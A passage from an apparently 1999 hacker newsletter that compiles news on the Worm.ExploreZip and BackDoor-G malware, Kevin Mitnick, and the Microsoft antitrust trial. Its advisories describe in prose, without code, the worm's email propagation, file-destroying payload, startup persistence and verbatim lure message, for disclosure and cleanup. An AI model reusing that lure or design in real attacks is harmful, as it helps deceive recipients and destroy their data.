runs the danger of setting nasty precedents that will begin to snare regular people, not programmers. Many convicted hackers are released from prison only to be denied the ability to use a computer or the Internet. In the past, this made it impossible for a person to get work as a programmer; today, they can't even push the order screen at McDonald's. After all, it's hooked up to a central database -- who knows what havoc a hacker could wreak while punching up an order of fries? One of the best ways to put this all in context is to take yourself back in time 100 years to the turn of the last century, when auto racing was just beginning to roar across the scene. The machines were grand in size and sound if not in speed -- Emile Levassor won the 1895 Paris-Bordeaux race with his four-horsepower jack rabbit that covered the distance at an average speed of 14.9 mph. Feats of technical prowess like that frightened the world, and by 1903 the French government was shutting down auto races -- or restricting the death-defying machines to a bearable 20 mph. A few decades later, James Dean became a rebel automobile hacker who scared parents around the globe. Today, he's just another cutie pie competing with Hanson for poster space on dorm room walls. One era's demon is another's icon. Is teen idol the next stop for Kevin Mitnick? salon.com | June 9, 1999 - - - - - - - - - - - - About the writer Peter Wayner is the author of "Disappearing Cryptography," "Digital Cash" and "Digital Copyright Protection." @HWA 23.0 More Email Worms/Trojan ~~~~~~~~~~~~~~~~~~~~~~~~ June 10th 1999 From HNN http://www.hackernews.com/ More Email Worms/Trojan contributed by zuc Symantec has discovered a new malicious piece of software that travels as an email attachment named "zipped_files.exe". Similar to Melissa this worm/trojan uses the MAPI commands and Microsoft Outlook on Windows systems to replicate. This code was originally discovered in Israel. Symantec http://www.symantec.com/avcenter/venc/data/worm.explore.zip.html Worm.ExploreZip Virus Name: Worm.ExploreZip Aliases: W32.ExploreZip Worm Infection Length: 210,432 bytes Area of Infection: Windows System directory, Email Attachments Likelihood: Common, Worldwide Detected as of: June 6, 1999 Characteristics: Worm, Trojan Horse Overview: Worm.ExploreZip is a worm that contains a malicious payload. The worm utilizes Microsoft Outlook, Outlook Express, Exchange to mail itself out by replying to unread messages in your Inbox. The worm will also search the mapped drives and networked machines for Windows installations and copy itself to the Windows directory of the remote machine and modify the WIN.INI accordingly. The payload of the worm will destroy any file with the extension .h, .c, .cpp, .asm, .doc, .ppt, or .xls on your hard drives, any mapped drives, and any network machines that are accessible each time it is executed. This continues to occur until the worm is removed. You may receive the worm as an attachment called zipped_files.exe. When run, this executable will copy itself to your Windows System directory with the filename Explore.exe or to your Windows directory with the filename _setup.exe. The worm modifies your WIN.INI or registry such that the file Explore.exe is executed each time you start Windows The worm was first discovered in Israel and submitted to the Symantec AntiVirus Research Center on June 6, 1999. Technical Description: Worm.ExploreZip utilizes MAPI commands and Microsoft Outlook/Microsoft Exchange on Windows 9x and NT systems to propagate itself. The worm e-mails itself out as an attachment with the filename zipped_files.exe in reply to unread messages it finds in your Inbox. Once it responds to a message in your Inbox, it will mark it so it will not respond to the message again. The e-mail message sent may appear to come from a known e-mail correspondent in response to a previously sent e-mail with the appropriate subject line and contains the following text: Hi Recipient Name! I received your email and I shall send you a reply ASAP. Till then, take a look at the attached zipped docs. bye or sincerely Recipient Name The worm will continue to monitor the Inbox for new messages and respond accordingly. The worm will also search the mapped drives and networked machines for Windows installations and copy itself to the Windows directory of the remote machine and modify the WIN.INI accordingly. Once the attachment is executed, it may display the following window: The button displayed is the "OK" button and is dependent on the language of the infected operating system. The example above was taken from a Hebrew Windows system. The worm also copies itself to the Windows System (System32 on Windows NT) directory with the filename Explore.exe or _setup.exe and also modifies the WIN.INI file (Windows 9x) or the registry (on Windows NT) so, the program is executed each time Windows is started. You may find this file under your Windows Temporary directory or your attachments directory as well depending on the e-mail client you are using. E-mail clients will often temporarily store e-mail attachments in these directories under different temporary names. Payload: In addition, when Worm.ExploreZip is executed, it also searches through the C through Z drives of your computer system and accessible network machines for particular files. The worm selects a series of files to destroy of multiple file extensions (including .h, .c, .cpp, .asm, .doc, .xls, .ppt) by calling CreateFile() and making them 0 bytes long. One may notice extended hard drive activity when this occurs. This can result in non-recoverable data. This payload routine continues to happen while the worm is active on the system. Thus, any newly created files matching the extensions list will be destroyed as well. Repair Notes: Symantec AntiVirus Research Center has also provided a small utility called KILL_EZ to remove the virus from memory to avoid rebooting from a clean system disk. For more information on KILL_EZ utility, refer to the following URL: http://www.sarc.com/avcenter/kill_ez.html To remove this worm manually, one should perform the following steps: 1.Remove the line run=\Explore.exe or run=\_setup.exe from the WIN.INI file for Windows 9x systems. For Windows NT, remove the registry entry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run which will refer to Explore.exe or _setup.exe 2.Delete the file Explore.exe or _setup.exe. One may need to reboot first or kill the process using Task Manager or Process View (if the file is currently in use). Norton AntiVirus users can protect themselves from this worm by downloading the current virus definitions either through LiveUpdate or from the following webpage: http://www.symantec.com/avcenter/download.html Write-up by: Eric Chien Written: June 6, 1999 Update: June 11, 1999 @HWA 24.0 Stanford Searches for "Hacker" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 10th 1999 From HNN http://www.hackernews.com/ Stanford Searches for "Hacker" contributed by Dead.Under.Water Stanford University was a victim of a spammer recently. A message, sent to some 25,000 Stanford email accounts, accused the school of giving housing preferences to minorities. Prosecutor Julius Finkelstein, head of Santa Clara County's high-tech crimes unit, said the "hacker" could be charged with such offenses as unauthorized use of a computer account and harassment via e-mail. Evidently sending hate filled emails grants you the hacker moniker? Yahoo News http://dailynews.yahoo.com/headlines/ap/technology/story.html?s=v/ap/19990603/tc/racist_mail_1.html ( this link didn't work as of June 24th -Ed ) @HWA 25.0 Mitnick Demo Pictures now Available ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 10th 1999 From HNN http://www.hackernews.com/ Mitnick Demo Pictures now Available contributed by Macki Pictures of the FREE KEVIN Demonstrations held last week in front of federal courthouses across the country have been posted. Pictures from the demonstrations in Cleveland, New York, and Moscow have been made available at the FREE KEVIN Demos website. Kevin Mitnick's sentencing hearing is scheduled for Monday, June 14th. FREE KEVIN Demonstrations http://www.2600.com/demo/index.html 26.0 Does Cracking Affect Consumer Confidence? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 10th 1999 From HNN http://www.hackernews.com/ Does Cracking Affect Consumer Confidence? contributed by evenprime Eric Lundquist thinks that it is wrong to crack servers because doing so undermines consumers' confidence in e-commerce. (In my opinion consumers would be wise not to trust e-commerace.) Interesting how the author never gets around to blaming vendors who tell people to place their trust in the rubbish that is being sold. ZD Net http://www.zdnet.com/zdnn/stories/comment/0,5859,406094,00.html 27.0 Worm.ExploreZip is Causing Massive Damage ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 11th 1999 From HNN http://www.hackernews.com/ contributed by Merlock Worm.ExploreZip is quickly spreading across the world. First discovered last Sunday in Israel it has propagated into some of the largest companies in the US. The transmission method of this program is similar to Melissa which uses the email addresses in Microsoft Outlook address book, Worm.ExploreZip however, automatically replies to the incoming email of MS Exchange or MS Outlook users. Unlike Melissa Worm.ExploreZip carries a very malicious payload that will actually delete certain files and modify others. Companies such as Boeing, Price Waterhouse Coopers, GTE, and General Electric have lost entire hard drives to this virus. Many companies are attempting to be proactive by disconnecting themselves from the internet. Only users of Microsoft products are effected by this latest threat. ABC News http://www.abcnews.go.com/sections/tech/DailyNews/worm990610.html C|Net http://www.news.com/News/Item/0,4,37658,00.html?st.ne.fd.gif.d MSNBC http://www.msnbc.com/news/278660.asp ZD Net http://www.zdnet.com/pcweek/stories/news/0,4153,2273659,00.html Nando Times http://www.techserver.com/story/body/0,1634,58370-93054-664175-0,00.html PC World http://www.pcworld.com/pcwtoday/article/0,1510,11334,00.html ZD Net http://www.zdnet.com/zdnn/special/doublevirus.html C|Net; Data virus forces email shutdowns By Kim Girard Staff Writer, CNET News.com June 10, 1999, 7:10 p.m. PT update Corporations are scrambling to cope with a new data-destroying virus that is forcing the shutdown of email systems nationwide. The virus, first reported to the Symantec Antivirus Research Center on Sunday by five companies in Israel, is called Worm.ExploreZip or Troj_Explore.Zip. The worm uses Mail Application Programming Interface (MAPI) commands and Microsoft Outlook on Windows systems to propagate itself, Symantec said. In some ways, the virus is the sequel to the Melissa virus, which spread with unprecedented speed in March. Worm.ExploreZip spreads from computer to computer by taking advantage of automation features available to people using Microsoft email software on Windows machines. Although the new virus doesn't spread as fast as Melissa, it causes more damage, according to antivirus experts, deleting Microsoft Word, Excel, and Powerpoint document files, among others. (See CNET Topic Center on antivirus software.) Several firms have shut down their email systems entirely while IS staff root out the virus, according to Symantec. Boeing was hit particularly hard. The Seattle-based aerospace giant shut down its email system, which is used by at least 150,000 employees, at 2:30 p.m. today, a company spokesman said. The company was still assessing the damage caused by the virus, but the spokesman, who asked not to be named, said he knew of at least one employee whose entire hard drive was wiped out. "As soon as we became aware of it, we told everyone, and we put a message up on our internal Web site," he said. Late in the day the email still had not been restored. The company hopes to have it back up by tomorrow. PricewaterhouseCoopers took down its entire email system, used by 45,000 U.S. employees, also at 2:30 p.m. in response to the virus. The company was just bringing up parts of the system at 7 p.m., a company spokesman said, but he didn't know how much damage had been done or how many workers had been affected. Some companies said they disarmed the virus--actually a software "worm"--before it could cause many problems. Microsoft, for example, disconnected its email servers from the Internet at about 9 a.m. so that programmers could work on an antidote, company spokesman Dan Leach said. The servers were up and running two hours later, he added. Employees of antivirus software maker Symantec report that they have received email that includes the worm, which arrives as an attachment to the missives. Companies such as General Electric and Southern Company have had files deleted by the virus, according to Bloomberg. Virus protection firm Trend Micro spokeswoman Susan Orbuch said earlier today that the company had received 107 calls from customers concerning the virus. Thirteen of those calls came from those already infected, she said. Orbuch said that Trend Micro knew of five large companies that had been infected, as well as several public relations firms and a magazine. She declined to name the companies. Nate Meyer, spokesman for Credit Suisse First Boston, said the virus had struck the company's offices in New York, San Francisco, and Palo Alto, California, and that other offices worldwide may have been affected. He said he did not know how many of the company's computers were infected. Meyer said the Credit Suisse's technology department had been working on the problem for much of the day and had sent out a warning about it this morning. But he said the virus did not seem to have slowed the company's operations, adding that it had not disrupted the investment company's stock trading. Meyer noted that his own email had been working throughout the day. Quick repairs Representatives at AT&T and Intel reported that they were able to quickly repair their systems after being hit by the virus. "These are things that we have to do because of the communications reality that we live in today," an AT&T spokeswoman said. The virus disrupted work at Cambridge, Massachusetts-based industry analyst firm Forrester Research, where Internet access, including email, was cut off. Another analyst firm, Current Analysis, sent email to customers warning them not open any email attachments coming from the firm with the .exe extension because an employee's PC had been infected. The infected email may contain the message: "Hi [recipient name]! I received your email and I shall send you a reply ASAP. Till then, take a look at the attached zipped docs. bye." Unlike the Melissa virus, which harvested from a user's address book, the new virus raids an email in-box when executed through Microsoft Exchange or Outlook. The worm attaches itself as a file called zip_files.exe and is sent off with a return email. Although the virus isn't expected to spread as quickly and to as many computers as Melissa did, it does destroy files. "It's an .exe file posing as a Zip file," said Eric Chien, senior researcher at the Symantec Antivirus Research Center. The worm is particularly insidious because it searches through hard drives and destroys files with extensions of .doc, .xls, .ppt, .c, .cpp, .h, or .asm, he said. Chien said that means whoever wrote the virus was targeting corporations--seeking to destroy developers' source code, as well as documents created using Microsoft Office applications, such as Word and Excel. "It singles out those files and destroys them," he said. "This hits the local drive and the file server." Extent of damage not known Chien said it is unclear how much damage the virus has done. "We've received multiple reports from major corporations in the U.S.," he said. "What we're hoping is that the initial jump on this Sunday night will prevent it from spreading." Panda Software said it has added free downloads for the detection and disinfection of the virus--which it called "extremely dangerous"--on its Web site. The company also urged people to update antivirus software. Esther Shin, a public relations specialist at Aventail, a Seattle-based business-to-business e-commerce firm, said two of her colleagues encountered the virus this morning. One of them lost all the files on his hard drive after he opened the attachment, she added. The email was worded to make the recipient believe that the message came from a Microsoft employee, she said. Shin said she got a similar email but didn't open the attachment. "When I got hit I called all my contacts," she said. Bloomberg and News.com's Troy Wolverton, Dan Goodin, and Tim Clark contributed to this report. @HWA 28.0 Don't Forget About BackDoor-G, it is Still Around ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 11th 1999 From HNN http://www.hackernews.com/ contributed by Weld Pond Don't forget about BackDoor-G. It also arrives as an email attachment but instead of deleting files this one could allow someone else to control your computer behind the veil of a screensaver. The Irish Times http://www.ireland.com/newspaper/finance/1999/0604/fin320.htm Bug hits big screen by the backdoor Backdoor-G virus arrives by e-mail and sets up a screensaver which lets hacker control computer remotely As if you didn't already have enough worries. The wary computer user already feels bunkered in and hunkered down, in between hiding behind firewalls, running anti-virus programs and keeping a watchful eye on suspiciouslooking e-mails. You have to look out for infected files on floppy disks, panic over the latest holes in e-mail programs, and be cautious with how you set up company and personal websites. It's almost enough to send you back to a manual typewriter. Now comes an insidious screensaver virus - a new computer devastator that sneaks into your system via an e-mail and sets up a screensaver which lets some badguy hacker control your computer remotely, download files, and all that other stuff that appears in Tom Cruise films but which we would all rather believe couldn't happen in real life. According to security software company Network Associates, Backdoor-G is a so-called "trojan horse" program, which arrives into your computer hidden inside an attack program which potential victims receive as an unsolicited e-mail. The program has reportedly taken the form of both a screensaver and an update to a computer game. Open the e-mail and the program installs itself, allowing Backdoor-G to turn the victim's computer into a client system. In other words, it allows a hacker to operate the victim's computer remotely over the Internet. The hacker can thus gain access to just about anything on the victim's computer. Unfortunately, it's also almost impossible to detect once it executes because it is capable of changing its file name. And according to Network Associates, it spreads everywhere in your computer's system. Admittedly, the screensaver aspect of this virus has its amusement potential - hmmm, can't we all imagine a bitter and twisted screensaver we'd like to design to announce our conquest of the computer belonging to some particularly detested person in our lives? But the arrival of Backdoor-G is probably more apt to make you sigh in exasperation. Computers were supposed to make life easier, more manageable, more controllable. Okay, you can stop laughing, but you know what I mean. Instead, they just seem to bring more stress, hair loss, heartburn and overly-chewed fingernails. But it's perhaps wise to remind computer users that many, if not most, aggravations come not from the machines or even, sometimes, the software. They come from humans who still make far too many assumptions about what computers, software, and the Internet can or cannot do. Partly, that's our fault, because we accept products from hardware and software vendors which in any other industry would be considered too unreliable, unstable and under-tested to be released onto the market. We believe the vendors when they excuse themselves by telling us it's all too complicated to explain, it's the nature of the medium and so forth. That's appalling, but as long as we lack the collective spine to demand better, we're stuck with what we get. But it's hard to see how we can obliterate the virus problem, since a computer is a sitting duck for viruses because of the way in which we use them - sharing disks, transferring files, going on and off the Net and downloading things from places we don't know. Few people take even basic precautions against viruses and so, these things spread. In addition, many people never bother to make backups of their work, and thus are twicedevastated if struck by a virus or another form of computer attack. And even if the anti-virus software makers come up with a fix to one virus, some hacker is always brewing another that we cannot yet imagine. In the days that it takes to create an antidote, thousands or millions can be hit. In the case of particularly nasty viruses, entire companies can be brought down at the cost to the global economy of billions of pounds. So what's a poor computer user to do? There's not much else to recommend but to proceed with caution, which means educating yourself on how to keep your own machine as clean as possible by being vigilant against viruses and other forms of computer attack. Buy a good virus-scanning software package and use it. Be wary about what you download off the Net and scan it first. Don't open e-mail with attachments unless you know the sender (and even then, be cautious about all attachments). And create backups. Anyone who has ever lost irreplaceable, important files off a floppy disk or hard-drive knows the excruciating pain of that particular experience. You may still have to clean up a computer if a virus brings it down - and that's not a pleasant task - but having your files intact somewhere else at least keeps the misery from reaching bottomless depths. [SBX] A detector for the Backdoor-G virus is online at www.nai.com @HWA 29.0 MS Antritrust Trial Looks at Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 11th 1999 From HNN http://www.hackernews.com/ contributed by m4in District Court Judge Thomas Jackson has asked a government expert witness whether removing the browser from Windows will increase or diminish its security. Analysts think that the judge is wondering what the repercussions are of including the browser with the operating system. C|Net http://www.news.com/News/Item/0,4,37649,00.htm Wired http://www.wired.com/news/news/politics/story/20139.html C|Net's link seems to have died heres the wired story; Will Curiosity Kill the Browser? by Declan McCullagh 12:15 p.m. 10.Jun.99.PDT WASHINGTON -- On the last day of the government's case, the federal judge overseeing the Microsoft antitrust trial asked Thursday if including a browser with Windows could weaken a computer's security. "Are there any security issues involved in the choice of a browser [that may increase] the risk of penetration by a virus or something like that?" US District Judge Thomas Penfield Jackson asked a witness testifying for the government. Read ongoing US v. Microsoft coverage Edward Felten, a Princeton University scientist, said that some security-conscious network administrators may prefer to have no browsers on computers. Felten was the last witness called by the government, and Microsoft will call its rebuttal witnesses starting Monday. "Is there any way of absolutely assuring security?" Jackson asked. He also wondered which browsers are safer than others. Reading the portents in a judge's questions is, of course, a perilous task. Some wags in the press gallery suggested that His Honor must be shopping for a computer. Or was the technology-impaired Jackson simply confused? But the theory, if true, that would be most damaging to Microsoft goes like this: Jackson is wondering what the downsides are to Microsoft's decision to include Internet Explorer with Windows. This became an important question since a decision last summer by an appeals court, which unceremoniously overturned Jackson's December 1997 decision on a related Justice v. Microsoft case. In a 2-1 decision, the panel said judges should be "deferential to entrepreneurs' product design choices" and companies should be free to integrate products as they see fit -- so long as the improvements benefit customers. Jackson's comments could mean that he plans to weigh whether or not Microsoft's decision to integrate Internet Explorer with Windows was, on the whole, a good thing for the general public. Other government witnesses earlier in the trial have offered additional reasons why welding IE into the operating system reduces consumer choice. Microsoft has claimed that including IE produces a more useful product with Internet functionality that third-party software developers can rely on. Jim Allchin, a Microsoft vice president, testified that these features "simply cannot be achieved through the use of add-on products from third parties." But Felten said there was no reason Internet Explorer had to be shipped with the operating system. "Microsoft can deliver a version of Windows 98 from which the Internet Explorer browser has been removed and deliver it in such a way that does not affect the non-Web browsing functions of Windows 98," he said. The Justice Department pointed to a January 1997 email message from Allchin to Bill Gates that said another executive wanted Win98 "minus IE 4.0 in June.... IE 4.0 can be added next year." Felten claimed he had designed a program that removes browsing capability from Windows 98. But Microsoft had Felten demonstrate it and showed him he had not actually removed Web browsing features. The trial will continue on Monday when Microsoft calls AOL's David Colburn as a hostile witness. Microsoft said it will challenge the credibility of Colburn, an AOL executive who was a government witness earlier. @HWA 30.0 Web Defacements Hindering Open Government ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 11th 1999 From HNN http://www.hackernews.com/ contributed by Code Kid Eric Lundquist claims that web page defacements hold back the development of a web accessible government and that penalties for such actions should be proportional to the damage caused. Getting people to vote or file taxes online is difficult if government web sites can't keep the intruders out. MSNBC http://www.msnbc.com/news/278369.asp Hacking is no longer merely a prank COMMENTARY: Hacking retards the growth of a Web-accessible government and should hold penalties proportional to the crime By Eric Lundquist, PC Week ZDNN June 9 — Getting your site hacked used to be simply an embarrassment. Your carefully designed home page suddenly became a billboard for lewdness, racism or whatever the hacker desired to create. However, now — and more so in the future — a hacked site is a public indication that you are not ready to play in the digital age. Companies and government organizations are now realizing this, and hackers who protest that a hack is a prank are finding that a prank can result in a bunch of FBI agents coming through the front door. IN THIS DIGITAL AGE, your company — whether it be an Amazon, E-Trade or some idea still forming — is built on a brand, a process and an information infrastructure. The way your site appears on the Web; the process by which a Web visitor can maneuver and buy products; and the ability of your site to scale, connect to suppliers and customers, and securely maintain a digital relation will determine your success. Sites that scale and allow you to shop comfortably in a digital store can quickly extend their brands from books to auctions to pet foods and beyond. Sites that crumble while you and the rest of the panicked investment community try to bail out on a stock will find themselves abandoned and facing a new realm of legal liabilities. Hacked sites visibly and fundamentally shake the faith in the brand and the products being offered at the digital storefront. This loss of faith in the brand carries over to and is magnified in the government realm. Internet access is on the verge of becoming sufficiently ubiquitous to allow organizational functions to move to the Web. If the first big thing the Web allowed was personal access and community building from the ground up, the next big thing is allowing existing organizations to use the Web to assume previously cumbersome functions. Vote on the Web? Sure. Register your car via the Web. File your taxes. Get your refund. All these functions are certainly possible. What is missing is trust. Trust is a difficult dimension to describe, but it most clearly is apparent in its absence. Don’t ask a citizenry to register to vote via the Web if the government’s top legal agencies can’t keep their home pages free from graffiti. And it is the trust that is shaken when the White House site is hacked. Or the FBI site. Or the Senate site. Hacking is more than breaking a few minor laws. Hacking is certainly not just being a good digital citizen by showing the security gaps that now exist to prevent more serious transgressions in the future. Hacking is neither clever nor funny, nor something to be tossed off as adolescent humor from sci-fi-addled minds. Hacking retards the growth of a Web-accessible government and should hold penalties proportional to the crime. 31.0 Worm.ExploreZip Continues its Rampage ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 14th 1999 From HNN http://www.hackernews.com/ contributed by nvirB After forcing some companies to completely shut down thier networks and keeping some administrators at work all weekend people are bracing for Worm.ExploreZip to resurface with a vengeance today as employees return to work. While Worm.ExploreZip has the fast spreading capabilities of Melissa it also contains a very destructive payload that can delete files. IT administrators are bracing for the expected onslaught of inevitable mutations. MSNBC http://www.msnbc.com/news/278660.asp Nando Times http://www.techserver.com/story/body/0,1634,59360-94597-674149-0,00.html C|Net http://www.news.com/News/Item/0,4,37697,00.html?st.ne.fd.tohhed.ni FBI and NIPC On the Hunt The FBI is hot on the trail looking for the creator of Worm.ExplorerZip. This is probably more of a PR stunt than anything. The odds of them actually finding whoever created this are slim to none. ZD Net HTTP://www.zdnet.com/zdtv/cybercrime/viruswatch/story/0,3700,2274493,00.html Wired http://www.wired.com/news/news/technology/story/20168.html Mac Vulnerable Too Symantec Utilities is claiming that if a Mac user runs Windows emulation software, names files with .doc, .ppt, .xls, etc..., and either checks his mail under emulation or is on a mixed environment network it is possible to contract this worm. (Ed Note: Any Mac user who is running this brain dead setup deserves to be infected.) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2274574,00.html C|Net; How the email worm works By Stephen Shankland Staff Writer, CNET News.com June 10, 1999, 6:15 p.m. PT The Worm.ExploreZip virus, while different in some functional details from the Melissa virus that hit in March, takes advantage of a similar vulnerability: The fact that so many people now routinely use email. The new virus emerged this week, spreading from user to user by taking advantage of automation features available to users of Microsoft email software on Windows machines. Like Melissa, it requires some active participation of the victim: opening the malicious file, or "payload," attached to the email message. And again like Melissa, the malicious program then modifies the victim's computer system to send more copies of itself automatically by email. (See CNET Topic Center on antivirus software.) To encourage a person to open the attachment, both malicious programs use the similar ploy: Trick the victim into thinking he or she has just received a useful document from a trusted source. Both programs can get away with this, because the infected email comes from a person likely to be known by the recipient. But there the differences end. Where Melissa was relatively benign to users, Worm.ExploreZip deletes Microsoft Word, Excel, and Powerpoint document files, said Wes Wasson, head of security products marketing at Network Associates. Where Melissa tapped into address books set up in Microsoft Outlook, Worm.ExploreZip's modus operandi is just to bounce back incoming email automatically with a response including the malicious program, Wasson said. That means Worm.ExploreZip will spread more slowly, he said. "How fast it spreads correlates to how many emails you get," he said. Melissa, on the other hand, sent itself to 50 entries in the address book, and those entries themselves could each be mailing lists. Regardless of their propagation rate, both viruses depend on automated email features. Worm.ExploreZip basically uses a modified version of the same feature that allows a person on vacation to set up email software to automatically reply with an "try back later" message, Wasson said. The advent of email as a distribution mechanism has allowed a new class of viruses, Wasson said. In the old days, viruses had to be smaller, but Worm.ExploreZip is comparatively huge at more than 200 kilobytes, he said. "Now with email, I don't have to be slim like I was before," Wasson said. "Viruses and worms can be written in [the programming language] C. This is really cutting-edge science." The increasing power of email viruses means that sophisticated hackers who once looked down on viruses now see them as powerful tools to obtain information stored on target computers, particularly because using email makes it easier to obscure the origin of the attack, he said. "The hacker believes the virus is going to be more of a stealth approach," he said. Selling security Antivirus software sellers profit from virus scares. Sales of antivirus software jumped 67 percent in the week the Melissa virus hit, according to market research firm PC Data. Network Associates' Wasson acknowledges the sales boost, but insists his company is out there to help people, pointing as evidence to the company's free, virus clinic detection services available over the Internet. "Rather than hold [people] hostage and take advantage of an incident, we'll give it to them for free," he said. Network Associates' competitor TrendMicro offers a similar service. As more companies begin to become more wary of the risks posed by the Internet, Network Associates is offering more security consulting services. For example, the company hires itself out to find vulnerabilities in computer systems, Wasson said. "Customers come to us all the time, saying check my security out, bang on my firewall," he said, referring to the protective software designed to keep computer networks safe from unauthorized access. In addition, the company is offering new software next month called CyberCop Sting that not only sets off alarms when there's a burglar, but also lets companies set up decoy systems to lure intruders and record information about them, Wasson said. The strategy is similar to the technique described by author Clifford Stoll in his book, The Cuckoo's Egg: Tracking a Spy Through the Maze of Computer Espionage. -=- FBI investigating email worm By Tim Clark Staff Writer, CNET News.com June 11, 1999, 3:00 p.m. PT update In the wake of yesterday's attack by the virulent Worm.ExploreZip virus, the FBI said it is investigating the case as a possible crime. "As was the case with Melissa, the transmission of a virus can be a criminal matter, and the FBI is investigating," said Michael Vatis, director of the National Infrastructure Protection Center (NPIC). Vatis said the worm has the potential of doing significant damage to private sector and government computer systems. (See CNET Topic Center on antivirus software.) "It is critical for computer users to be aware of and take the well-publicized steps to protect against and mitigate potential damage caused by malicious code," he said in a statement released this afternoon. He added that transmission of malicious code can be a federal criminal offense and that the FBI is "aggressively investigating" the matter. The National Infrastructure Protection Center is monitoring developments and coordinating field office investigations, he said, urging victims of the virus to contact the FBI field office nearest them, or the NIPC Watch and Warning Unit, which can be reached by email at nipc.watch@fbi.gov. "Because of the destructive payload delivered by this virus, its potential impact is significant," Vatis said. "All email users should exercise caution when reading their email for the next few days and bring unusual messages to the attention of their system administrator." After the Melissa virus outbreak that began March 26, the FBI joined other agencies to identify and track down whoever had created, then spread the virus. On April 1, a 30-year-old New Jersey man, David L. Smith, was arrested by federal and state officials and charged in the case. He has pleaded not guilty and his case is still pending. -=- Data virus forces email shutdowns By Kim Girard Staff Writer, CNET News.com June 10, 1999, 7:10 p.m. PT update Corporations are scrambling to cope with a new data-destroying virus that is forcing the shutdown of email systems nationwide. The virus, first reported to the Symantec Antivirus Research Center on Sunday by five companies in Israel, is called Worm.ExploreZip or Troj_Explore.Zip. The worm uses Mail Application Programming Interface (MAPI) commands and Microsoft Outlook on Windows systems to propagate itself, Symantec said. In some ways, the virus is the sequel to the Melissa virus, which spread with unprecedented speed in March. Worm.ExploreZip spreads from computer to computer by taking advantage of automation features available to people using Microsoft email software on Windows machines. Although the new virus doesn't spread as fast as Melissa, it causes more damage, according to antivirus experts, deleting Microsoft Word, Excel, and Powerpoint document files, among others. (See CNET Topic Center on antivirus software.) Several firms have shut down their email systems entirely while IS staff root out the virus, according to Symantec. Boeing was hit particularly hard. The Seattle-based aerospace giant shut down its email system, which is used by at least 150,000 employees, at 2:30 p.m. today, a company spokesman said. The company was still assessing the damage caused by the virus, but the spokesman, who asked not to be named, said he knew of at least one employee whose entire hard drive was wiped out. "As soon as we became aware of it, we told everyone, and we put a message up on our internal Web site," he said. Late in the day the email still had not been restored. The company hopes to have it back up by tomorrow. PricewaterhouseCoopers took down its entire email system, used by 45,000 U.S. employees, also at 2:30 p.m. in response to the virus. The company was just bringing up parts of the system at 7 p.m., a company spokesman said, but he didn't know how much damage had been done or how many workers had been affected. Some companies said they disarmed the virus--actually a software "worm"--before it could cause many problems. Microsoft, for example, disconnected its email servers from the Internet at about 9 a.m. so that programmers could work on an antidote, company spokesman Dan Leach said. The servers were up and running two hours later, he added. Employees of antivirus software maker Symantec report that they have received email that includes the worm, which arrives as an attachment to the missives. Companies such as General Electric and Southern Company have had files deleted by the virus, according to Bloomberg. Virus protection firm Trend Micro spokeswoman Susan Orbuch said earlier today that the company had received 107 calls from customers concerning the virus. Thirteen of those calls came from those already infected, she said. Orbuch said that Trend Micro knew of five large companies that had been infected, as well as several public relations firms and a magazine. She declined to name the companies. Nate Meyer, spokesman for Credit Suisse First Boston, said the virus had struck the company's offices in New York, San Francisco, and Palo Alto, California, and that other offices worldwide may have been affected. He said he did not know how many of the company's computers were infected. Meyer said the Credit Suisse's technology department had been working on the problem for much of the day and had sent out a warning about it this morning. But he said the virus did not seem to have slowed the company's operations, adding that it had not disrupted the investment company's stock trading. Meyer noted that his own email had been working throughout the day. Quick repairs Representatives at AT&T and Intel reported that they were able to quickly repair their systems after being hit by the virus. "These are things that we have to do because of the communications reality that we live in today," an AT&T spokeswoman said. The virus disrupted work at Cambridge, Massachusetts-based industry analyst firm Forrester Research, where Internet access, including email, was cut off. Another analyst firm, Current Analysis, sent email to customers warning them not open any email attachments coming from the firm with the .exe extension because an employee's PC had been infected. The infected email may contain the message: "Hi [recipient name]! I received your email and I shall send you a reply ASAP. Till then, take a look at the attached zipped docs. bye." Unlike the Melissa virus, which harvested from a user's address book, the new virus raids an email in-box when executed through Microsoft Exchange or Outlook. The worm attaches itself as a file called zip_files.exe and is sent off with a return email. Although the virus isn't expected to spread as quickly and to as many computers as Melissa did, it does destroy files. "It's an .exe file posing as a Zip file," said Eric Chien, senior researcher at the Symantec Antivirus Research Center. The worm is particularly insidious because it searches through hard drives and destroys files with extensions of .doc, .xls, .ppt, .c, .cpp, .h, or .asm, he said. Chien said that means whoever wrote the virus was targeting corporations--seeking to destroy developers' source code, as well as documents created using Microsoft Office applications, such as Word and Excel. "It singles out those files and destroys them," he said. "This hits the local drive and the file server." Extent of damage not known Chien said it is unclear how much damage the virus has done. "We've received multiple reports from major corporations in the U.S.," he said. "What we're hoping is that the initial jump on this Sunday night will prevent it from spreading." Panda Software said it has added free downloads for the detection and disinfection of the virus--which it called "extremely dangerous"--on its Web site. The company also urged people to update antivirus software. Esther Shin, a public relations specialist at Aventail, a Seattle-based business-to-business e-commerce firm, said two of her colleagues encountered the virus this morning. One of them lost all the files on his hard drive after he opened the attachment, she added. The email was worded to make the recipient believe that the message came from a Microsoft employee, she said. Shin said she got a similar email but didn't open the attachment. "When I got hit I called all my contacts," she said. Bloomberg and News.com's Troy Wolverton, Dan Goodin, and Tim Clark contributed to this report. -=- 31.1 Removal of the Worm.ExploreZip virus (from MSNBC insert) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HOW TO GET RID OF IT If your computer is infected, security software company Network Associates recommends these steps to remove it: - If you’re running Windows 95 or 98: Restart your computer in MS-DOS mode, edit the WIN.INI file and remove the line run=c:\windows\system\explore.exe. Then delete the file c:\windows\system\explore.exe and restart Windows. - If you’re running Windows NT: Run REGEDIT (not REGEDT32) and locate the hive [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows] and remove the following key: 